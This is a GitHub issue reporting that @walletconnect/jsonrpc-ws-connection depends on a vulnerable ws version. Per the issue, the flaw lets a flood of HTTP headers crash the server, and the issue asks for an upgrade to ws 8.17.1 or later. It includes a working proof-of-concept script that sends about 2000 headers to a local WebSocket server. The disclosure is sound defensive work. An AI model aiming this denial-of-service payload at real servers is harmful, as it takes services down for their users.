walletconnect-monorepo icon indicating copy to clipboard operation
walletconnect-monorepo copied to clipboard

Published 20 hours ago verified publisher icon WalletConnect

Vulnerable `ws` dependency causing DoS vulnerability

Open josadcha opened this issue 1 year ago • 1 comments

Describe the bug The @walletconnect/jsonrpc-ws-connection package depends on a vulnerable version of the ws package (^7.5.1). This vulnerability allows a Denial of Service (DoS) attack by sending a request with many HTTP headers, exceeding the server.maxHeadersCount threshold and causing the server to crash.

SDK Version (if relevant)

  • Client: JS
  • Version 2.13.3

To Reproduce Steps to reproduce the behavior:

  1. Set up a project with the @walletconnect/jsonrpc-ws-connection package.
  2. Use the following proof of concept code to send a request with excessive headers: (from Dependabot):
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Expected behavior The @walletconnect/jsonrpc-ws-connection package should depend on a non-vulnerable version of the ws package (>=8.17.1). The server should handle requests with many HTTP headers gracefully without crashing.

Screenshots N/A

Desktop (please complete the following information):

  • OS: [e.g. iOS]
  • Browser [e.g. chrome, safari]
  • Version [e.g. 22]

Smartphone (please complete the following information):

  • Device: [e.g. iPhone6]
  • OS: [e.g. iOS8.1]
  • Browser [e.g. stock browser, safari]
  • Version [e.g. 22]

Additional context The vulnerability was reported by Ryan LaPointe in websockets/ws#2230

josadcha avatar Jun 27 '24 14:06 josadcha

CR-94 Vulnerable `ws` dependency causing DoS vulnerability

linear[bot] avatar Jun 27 '24 14:06 linear[bot]